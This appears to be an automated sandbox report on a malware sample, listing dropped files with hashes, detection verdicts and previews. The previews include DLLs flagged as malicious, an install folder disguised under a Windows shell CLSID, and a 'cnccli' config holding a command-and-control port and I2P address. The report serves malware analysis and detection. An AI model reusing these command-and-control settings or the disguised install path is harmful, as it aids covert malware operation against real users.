                File Type:Mini DuMP crash report, 15 streams, Wed Jan 1 17:11:06 2025, 0x1205a4 type
                Category:dropped
                Size (bytes):633932
                Entropy (8bit):1.0067414694163621
                Encrypted:false
                SSDEEP:768:op695wUHk8hj6OcYD/Onz2UIgiXmkgGdz/rHJ+d:okXBj6OcUOnz2UJF
                MD5:BA2EE4F42CFCFC0F6DAB58C4368FCD6B
                SHA1:ED1C138AE6D6C8E203348A04932EBD5C79D284BE
                SHA-256:BB45C8AE3922332D5BEDB5C7F1BD49550E0DFEDC4C0A4DF31D994EE967B5E965
                SHA-512:4639CD5A0648775C64E9B8B579AF0116D3F0EC806F37930F36B85081CAD57D5B282C5E13D78B6886E1A584AF6C7A4604D3CB4D9CB5E91E7BAFDE32F93574DED3
                Malicious:false
                Preview:MDMP..a..... .......*wug............$...........(...8...........` ......4...h...........`.......8...........T............/...|..........\!..........H#..............................................................................eJ.......#......Lw......................T............vug.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\System32\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):6726
                Entropy (8bit):3.7153809195983682
                Encrypted:false
                SSDEEP:96:RSIU6o7wVetb8EjEkYHV4nMC5aM4UB89bfDqmDvjvlfIN1m:R6l7wVeJ8Ej/YHcprB89bfpFfIN1m
                MD5:70FD3B2049EE0D56AFE5999C6210AA9A
                SHA1:D041672AF568D6814A92185680CDD3C914F25803
                SHA-256:EEC3CCE2943E980FFADBE50D041BA04BE1FB80D380A8846740E54BB3F2F51566
                SHA-512:8BA83C56F031577C719875CEA0798CF7C3AE4403133A9E421D1AD3B1A28856C716CE39BE5EFB6CD2CD1C0089DC764D0221296946BDD00BBCB7A790D5CCBC4751
                Malicious:false
                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.
                Process:C:\Windows\System32\WerFault.exe
                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):4603
                Entropy (8bit):4.410682346531106
                Encrypted:false
                SSDEEP:48:cvIwWl8zsMuJg771I90vWpW8VYkYm8M4JD2+AFBQ6Hyq85/3O4hA3+MDwMdd:uIjfMkI7L+7VMJabHzIA3ZLdd
                MD5:41CFE22AC35329CEEDA0FA4DC30CF11C
                SHA1:BE5D7834BEB753E6FBB3321B71B3E3393BCD9E51
                SHA-256:1AEDD90BC397FA5E5503E4A76BE530CBF9AAE1021C235ED98D6DD2734F8889D1
                SHA-512:E67C9DD258249AF8D2709C2F928F069B569F0F5566D6D5567842FB80815B8409AA7778CC7DD8798231AF184E2623D086E34EC34188199CFDFF1F6550E470EF1B
                Malicious:false
                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="657133" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                Process:C:\Windows\System32\svchost.exe
                File Type:data
                Category:dropped
                Size (bytes):77842
                Entropy (8bit):3.098414960825057
                Encrypted:false
                SSDEEP:1536:5WOSK/Z6U1YlD9brMYQf7Nm6PV7Rd8oFru:5WOSK/Z6U1YlD9brMYQf7Nm6PVVd8oFS
                MD5:A670A30815474C3F841FD20FD7CBDF74
                SHA1:4A1B60CCBF528E41E3B10A20CCBE73ED4765C72C
                SHA-256:5B013DB8489F3C1D388587F4FED036666B90AF90D21CDDDC3611E4A704D80970
                SHA-512:9D4D2BA2B3052AC2689E69571BCD187176D084BEE5D89F3D5F4BB0207DED123BA0A504567FF7CFD45FA7054ADB4353794E2CA06F14C86B4E825769E6E1B52D62
                Malicious:false
                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                Process:C:\Windows\System32\svchost.exe
                File Type:data
                Category:dropped
                Size (bytes):13340
                Entropy (8bit):2.685584356992996
                Encrypted:false
                SSDEEP:96:TiZYWB3hNDUY0Y/mW8HQUYEZlctKiDIPlDwTx1YaUzmnmMN9xhrI+M3:2ZDB0jlijYaUzmmMN7y+M3
                MD5:1EAC372E1EE2F5FE07FDBAAA17B98604
                SHA1:07F3591FA22CD451468450F6CCADB381F35A1C31
                SHA-256:B0543A6C34D059C82010CC44426D168403D8F6667ED6B1CEDC3C25CDEF96912E
                SHA-512:186591630F2C4858506B4B5E7034B2F0574C259D3BAA9916D3E8B3381F9D2430AB46C2EC92B44A75CB283674DB717543D575F8AC424B57CB62601980333F3E75
                Malicious:false
                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):115712
                Entropy (8bit):6.193969228624904
                Encrypted:false
                SSDEEP:1536:55YoK6WOBqFp//wVUE/+TGAf5EkgE1duJmwTxOd/lZ1pgX7:55YoSb/Iv/+TNf5Ee1YLTxOd9Z16X7
                MD5:EC9499EE84ED09B77BE0A35EC87B781C
                SHA1:4148D40284BAB415DDB828BD4061A4FE93C9AF26
                SHA-256:5E38EA7E3DD96FE1C6BB2EBA38C7BDE638C6B6E7898F906E343D9500AFF86499
                SHA-512:D65933B825419719021D0D2F43B45616A5B1238550BFDC72D2F4F148E284E9FE488417021A45B6D2F61770E31150B3331B1071AFE7EBB85AF6B379D040A9BEBC
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 26%
                Joe Sandbox View:
                • Filename: ET5.exe, Detection: malicious, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y........."h.............................P......JA....`... .........................................^....................................@..l...............................(.......................h............................text...x...........................`..`.data........0....... ..............@....rdata.. d...@...f...*..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..^...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..l....@......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):3639
                Entropy (8bit):5.660827517402496
                Encrypted:false
                SSDEEP:96:idH9NYJ9VFl3YPQYPTNYP6YPtYP/YPV3HQHfCzyLy+e56LE:AdNiTDXoNZ84U3w/Yj+e5h
                MD5:9DD49B1413C6A084CF2E9C1E4BFA61EA
                SHA1:48EB69EF13BFC059187DD83F67D4BC0536301AF8
                SHA-256:3EC99DEFC8ECEC93749DAB51BA4C0EDF6B660FC923508E71160BD56378FB1219
                SHA-512:BE9B648CF9C8AD328A1C9A6287C1E2AE9187B0DEAAF5FC4874ABD77C0DEE0AFBB577D61BC07F3850DB9F667EA6F7C0815FA3429BBB6BC25606495F4EA4A72F7C
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[D] (ini_get_sec) -> Done(name=cnccli)..[D] (ini_get_var) -> Done(sec=cnccli,name=server_host,value=9
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:Generic INItialization configuration [cnccli]
                Category:dropped
                Size (bytes):213
                Entropy (8bit):5.129024990254676
                Encrypted:false
                SSDEEP:6:1EVQLD4oWuJO+70XZ6DIzOD7kXpTRL9gWVUDeLn:Cjo5JO+70XZmeC7kX9vgpKL
                MD5:7D88563AD41BAF4026CFC5D098CBF40D
                SHA1:442756834CCCEB84F219F3C762852437FBB3458E
                SHA-256:D80EDD4C9FCF10348AAAB4D5F9D796AD827271827463D71FE32F2F896D0841D3
                SHA-512:F58A28FCAC43359D217C5B238C00BE73FBA791BEC7B987AA647F6FF02A7514D4C4B7449968DF9237D3B4D5BBF05DBEA82C8B41C956B2F0566FAE8C54056010DF
                Malicious:false
                Preview:[main]..version=400004957b19a09d..[cnccli]..server_host=9ad81489..server_port=41674..server_timeo=15000..i2p_try_num=5..i2p_sam3_timeo=15000..i2p_addr=2lyi6mgj6tn4eexl6gwnujwfycmq7dcus2x42petanvpwpjlqrhq.b32.i2p..
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):104448
                Entropy (8bit):6.236071662185895
                Encrypted:false
                SSDEEP:1536:v6YjTy83xoAWVbgh4xf4j0+Fwpj7bx8eSlsfe1tgvEK335:v6Yjqj1gh4xf4w+G7Cge1tgb335
                MD5:CE579A1BDCB9763DAFEBF01AD29F918C
                SHA1:F3E317C09E27DD0DA11AEE1578B7034BA1AC15DD
                SHA-256:0B628EA2BA9CD77621D90A0A7456659ED86C118EB7655F6074B3B5648BAC0A02
                SHA-512:EB688ED1A4AC5C3B975C2B005BE4BFD04D7CC762AF18DED190D0F903D39BDB301EADB800866BA72F6B8C36B7ABFB5765E0EB5081158C67BC33F056BD41280BC3
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 8%
                Joe Sandbox View:
                • Filename: ET5.exe, Detection: malicious, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*............Y.........?..............................0......Uu....`... .........................................^.......................$............ ..l........................... v..(.......................`............................text...............................`..`.data...............................@....rdata...a... ...b..................@..@.pdata..$............h..............@..@.xdata..T............r..............@..@.bss.... ................................edata..^............|..............@..@.idata...............~..............@....CRT....X...........................@....tls................................@....reloc..l.... ......................@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1021
                Entropy (8bit):5.4397611312982255
                Encrypted:false
                SSDEEP:24:CFAGHS+5lGyclY7Gfy6BgT7cRE9FLxJbJ/l0ERXX+e:CFdHS+54yclDYcm9FLnFlDb
                MD5:3CEF0743CCD2A6D4B0F6248C38548FF3
                SHA1:FC782D2939444A6F119552C50C969D7E91A1956A
                SHA-256:B9BF139C71D597E5393CF935012790B2353FEE80D1D907354E97A752C77A4829
                SHA-512:F590334E1B285E3705A38A985C49B0CD3B2B232D3E3B70C1AB4466B6C30C585826BF05B187B278B76D273D6B6BD7B4F44A6A6F0949EC90D13281561634BC44A9
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (ebus_init) -> Done..[I] (ebus_subscribe) -> Done(handler=0x00007ffe126d1dbd)..[I] (tcp_connect) -> Done(sock=0x198,host=7
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                Category:dropped
                Size (bytes):92672
                Entropy (8bit):6.229119632298774
                Encrypted:false
                SSDEEP:1536:nZifIZPVsBXHCrwIxk8i/57CDDCZUohgfNGbDN:nZifcsVCrwI0CyZUocs
                MD5:7FEA520E80E7A73252F2A5C204BBF820
                SHA1:557D33F75805669A6D5E98D0E6CD3B790ECF3464
                SHA-256:64B09FAC89FC9645DFE624D832BB2FF2FC8BA6BA9BC1A96C6EEE8C7F9C021266
                SHA-512:6A8FE49BC671B2B1458C24E10509047B50150D3D565FC7FB45046A51C295E69189F35D53BA2F8727A44718F11E8A84EFDE019E5422E025767CF35FDA26F293F9
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 32%
                Joe Sandbox View:
                • Filename: ET5.exe, Detection: malicious, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...*.....f......Y.........Io..........................................`... .........................................^....................`..................l............................J..(....................................................text...............................`..`.data...............................@....rdata...U.......V..................@..@.pdata.......`.......<..............@..@.xdata.......p.......F..............@..@.bss....`................................edata..^............P..............@..@.idata...............R..............@....CRT....X............d..............@....tls.................f..............@....reloc..l............h..............@..B........................................................................................................................................................................
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):6988
                Entropy (8bit):5.390594499810993
                Encrypted:false
                SSDEEP:48:CFdHs54yclDYcm9FLnFlzBp1/J1EucIHEznRLEqqYE1X0EH+IK:idHrNYJ9VFlzBLTEcHELNEaEuEH6
                MD5:CF8CD0716FA3DED306D083F91EF5F89C
                SHA1:B3DBB17ED55B56339AF8612584F459C85CCB630E
                SHA-256:1F374C760BCEB3E864C929D75F7F172FCB51D74B7369B4BCC68F493D157FF5A0
                SHA-512:2A732FFB9A3219DA77511F9B0380D539D329CC949A03A8A9DB63C225265F9E8F1C9E083876FF0465A17FC6CA95890A3E87ED76AC88A80786821611C7ACAF01DF
                Malicious:false
                Preview:[I] (debug_init) -> Log open success(flog_path=C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\evtsrv.log)..[I] (debug_init) -> Done..[D] (ini_get_sec) -> Done(name=main)..[D] (ini_get_var) -> Done(sec=main,name=version,value=400004957b19a09d)..[I] (module_load) -> Done(name=ntdll.dll,ret=0x00007ffe22170000)..[D] (module_get_proc) -> Done(hnd=0x00007ffe22170000,name=RtlGetVersion,ret=0x00007ffe221ae520)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_win_dir=C:\Windows)..[D] (registry_get_value) -> Done(root=0xffffffff80000002,key=SOFTWARE\Microsoft\Cryptography,param=MachineGuid)..[I] (sys_init) -> GetWindowsDirectoryA done(sys_mach_guid=9e146be9-c76a-4720-bcdb-53011b87bd06)..[I] (sys_init) -> GetVolumeInformationA done(vol=C:\,vol_sn=0aeba93c)..[I] (sys_init) -> Done(sys_uid=c76a8f080aeba93c,sys_os_ver=10.0.19045.0.0)..[I] (net_init) -> Done..[I] (server_init) -> CreateThread(routine_gc) done..[I] (server_init) -> CreateThread(routine_accept) done..[I] (server_init)
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):8568
                Entropy (8bit):4.958673415285098
                Encrypted:false
                SSDEEP:96:e+I8WTr7LjdL33ZqPDNLWBsaBMG+xv9G86UJ5TMmyvmyLKkfUZleZnE/Ndm/7CIg:e+I8Mr7VtXl1zrrIqEVdm/7CItWR0SX
                MD5:27535CEE6740DFC50A78A0322415E67C
                SHA1:E80541CF15C8ED4C5EEDA8D8C24674A5B8A27F61
                SHA-256:FB0CDBF4E0215AE1866E97860C2AC3DD96E7498BFE2AF3D82378041CDFF7F292
                SHA-512:25F11A8262B5A2F59BD6C9D8673B5AD5A140EAE8C007244810B2924EB08B5CF54AE19E61BE5139319877278D11868BBD85BD2E6C67F5FAD4E2A458E2844EBC0C
                Malicious:false
                Preview:## Configuration file for a typical i2pd user.## See https://i2pd.readthedocs.io/en/latest/user-guide/configuration/.## for more options you can use in this file...## Lines that begin with "## " try to explain what's going on. Lines.## that begin with just "#" are disabled commands: you can enable them.## by removing the "#" symbol...## Tunnels config file.## Default: ~/.i2pd/tunnels.conf or /var/lib/i2pd/tunnels.conf.# tunconf = /var/lib/i2pd/tunnels.conf..## Tunnels config files path.## Use that path to store separated tunnels in different config files..## Default: ~/.i2pd/tunnels.d or /var/lib/i2pd/tunnels.d.# tunnelsdir = /var/lib/i2pd/tunnels.d..## Path to certificates used for verifying .su3, families.## Default: ~/.i2pd/certificates or /var/lib/i2pd/certificates.# certsdir = /var/lib/i2pd/certificates..## Where to write pidfile (default: /run/i2pd.pid, not used in Windows).# pidfile = /run/i2pd.pid..## Logging configuration section.## By default logs go to stdout with level 'inf
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):75977
                Entropy (8bit):7.8696816318811385
                Encrypted:false
                SSDEEP:1536:07klNoOPsg0evjAYqVwbLhhOW6xwz0U0paUgfVnsHk:EkPNPmevj5qabL9ydgNz
                MD5:E53A179BB45CD7EDD8371740D65076BD
                SHA1:6B74034746E12C2058614A9DF671C31B79EAA7E9
                SHA-256:C33D095DBFFC43047A7930EB0811B11208D166FCFD612D8ED32556A6CE82B9DB
                SHA-512:767105F8B88CD8C9E4E2BD9188C8174D5FD86D370D2E6A79B0E10EF4A79E994F24F8DB7A79C481B97F69DBEA8E311590E3B2D31E804EC5F572A3C37CF3EBC457
                Malicious:false
                Preview:I2Psu3................&.................1733281205......reseed@cnc.netPK........./.Y.o2*........;...routerInfo-eXkkiGm0Hskmt-0nixI7Fd2~NX5o5Laplk3k9Fh6Jr0=.dat..|f........59/}.w...............X.O..Q#.....M;`vv...oZ..;...U....gm..w._.y.......g.\....T..9<....v{...].K..Z..`....W..kX..7iu..bi..)..<.E.{.g..Q..v...RU....f.:~U-r.v.0.?I.c..S.W"U...P..9..*!..=+....oY..gY....m;t...n..mu.y...$q...,.?.._..v.n.z..m......Q....x....\..f.M.E31.[.xu._....K...:.1.i.i"..{c:>.YU.x...Gl.F.+......<..t..r....M....t....iy=....c0wWG.....-.lW.{.....w..\.g.2.0..1.......L..P....j.X..XPl..db.i..f`f....Y.o....T.P....._..d..f....h._..ik..ZQ``.ehnlldajd`..2.....C..`B.&.f.....:.n........)>.i...Q.I.a.f...N..ai.Ynn..f.I&. -..:.y.y^....N...N....~e!.^a...y.ai.n..i..`-F.:.UNf.e.&I..N...y...y.....>%n&en.......fU`..$..|dinjb`.$ B@.......X.Y.B..l9,,....L,...mu....s3....."...r<+.=...C.."...R.."LS..3.+...0..2.Y...../.9.......&`..-M.,.K\+...M2....}.#.........+s..".K.M`.20.@.3 .5/
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.654714265742094
                Encrypted:false
                SSDEEP:12:NCRm4ZC4ZElhu3qesntBEe1FByD0KJpkAw9DXEhLYGru:NCRgQqhPesntBEeXMXCAwpEh7K
                MD5:277CA4807FDE027621069661F070625B
                SHA1:18582CE91DDF0B2AC8B6C634AFAF6FADC550C23F
                SHA-256:9FD7D70F6871A86FD12CEA9602B17B41DB7CDEB9853D217F75323E69224888FD
                SHA-512:57D441378AD6A67ABB5A159AE2CAEFCACC9BE71DFE9D73774E9BD763218DB6426F2E24DEE2BCAF8BE474FDD93C13F1FCBA163CFC25D55BEF4D4E0DBFCC248395
                Malicious:false
                Preview:+.x.dOF......I......m.m.a.;QB..=.(...u.......4A.e.B.(..R..v:G..V2g..../6>..c...n....x..v`....Ru.?.F....[..To....5j<r....v....f.SW.O.;......z6.-.........d...t{L.%...K......5T._....x............[..8..<........;1....NF..+C.......-l..yh,.B..d(k.K.pr.s..~DL..Y9.D0...)...|h>..:J.~....i....=...*..."...).Yr....Vy.t...S.5h.Z*OA}`.......=..`....rF5.&..`%0......mR.F.......Id5.;6&.L`..Eik...XAA.l.p...Y.....#S9.H.'h.hnwHm....T_..7a. .[...H?q.7...2._.R>7.;`....3..r.[.F.s7.....|......j..W.3.QZ.
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.617743978840883
                Encrypted:false
                SSDEEP:12:pwcrOG/vAOXjR8GGwsfcsiA6qtrC2qy7OmU5YXA:m5eX9RafcDA6qtO2qGOmUYXA
                MD5:57F84FF5AB9195B0FC19A6FF23561E5E
                SHA1:457DBDC2DA521838BED26BEFEA079CB8FCEA8F37
                SHA-256:F559A1DC56CF8FE5AAE84F9C7FD55FCD0662C18C7C86271C5ACB1D7703B7CE5A
                SHA-512:13ACA223C2A6D68F8EA56F0DB7FB81918CCFBD85A1F36E194939EBB58C6446C648E20AD3131F0AD187C82AE4BAFE53D1CBA397F04DD7EB056DB7BDFD6A3C6B6E
                Malicious:false
                Preview:.E8...gi..0.kA0.n....A...x?.Vc8..b.c.rC...h......+}.eA^.E..N&L".p.nUNm....$.$aT...(.q.Gg.!L... ..[..2l{#..:T`...l......i......;..~.e.t.t...\`.n.#/....>..M1...#.xO..)^{......=.&...4.".~..q>`...(..3..[.O....F/m..].....v....O....M...g......L..+...K......%R..e.<Q6.R.W..{.\...\..Z>..44...N7.....@..Is .............y..1..J.w.e...N&.p....H....N..}O...d.>.....vn.3.#..9.ZY..y...L..Rs....>.n.bEKE.....[U_.w..y#...g(mIm..v..m.t&7&.).Ev.JT......>|E~.:...t...B......$.,g..|.....K..%N*..=I=.
                Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):7.5801736465304135
                Encrypted:false
                SSDEEP:12:aAgMv5/mVYqLWqrLiq+TyLoDtORcIwSbrLXbHz30BHan:Thx/EJFCFmSOW8rXTzYHa
                MD5:1E73BE8D2185FCB7E949D242CC89C6BE
                SHA1:832A327C59ACAB803BF56DB4C90F601CC9CE8279
                SHA-256:AC9E6CBFE9E23FC4F6A9A423EA194BF3F84777F6252136B45878F70609C8DFA5
                SHA-512:24447753E77D6A9577E7C1F3DEE02567D43A30E94DB1DA7BC9367CAE2AEBF523BA27821F17A51C28F55404B20EB0388B389DFCE1794C4959A8EB1CD8212D1B46
                Malicious:false
